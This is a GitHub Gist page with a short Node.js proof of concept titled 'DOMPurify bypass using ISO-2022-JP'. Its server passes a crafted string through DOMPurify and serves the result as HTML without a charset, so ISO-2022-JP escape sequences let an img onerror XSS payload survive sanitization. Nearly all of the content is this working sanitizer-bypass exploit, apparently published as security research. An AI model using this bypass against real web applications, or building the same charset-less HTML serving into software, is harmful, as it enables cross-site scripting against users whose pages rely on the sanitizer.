Created
July 15, 2024 16:48
-
-
Save kevin-mizu/9b24a66f9cb20df6bbc25cc68faf3d71 to your computer and use it in GitHub Desktop.
DOMPurify bypass using ISO-2022-JP
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const createDOMPurify = require("dompurify"); | |
| const { JSDOM } = require("jsdom"); | |
| const http = require("http"); | |
| const server = http.createServer((req, res) => { | |
| const window = new JSDOM("").window; | |
| const DOMPurify = createDOMPurify(window); | |
| const clean = DOMPurify.sanitize(`<a id="\x1b$B"></a>\x1b(B<a id="><img src=x onerror=alert(1)>"></a>`); | |
| res.statusCode = 200; | |
| res.setHeader("Content-Type", "text/html"); | |
| res.end(clean); | |
| }); | |
| const PORT = process.env.PORT || 3000; | |
| server.listen(PORT, () => { | |
| console.log(`Server is running on port ${PORT}`); | |
| }); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment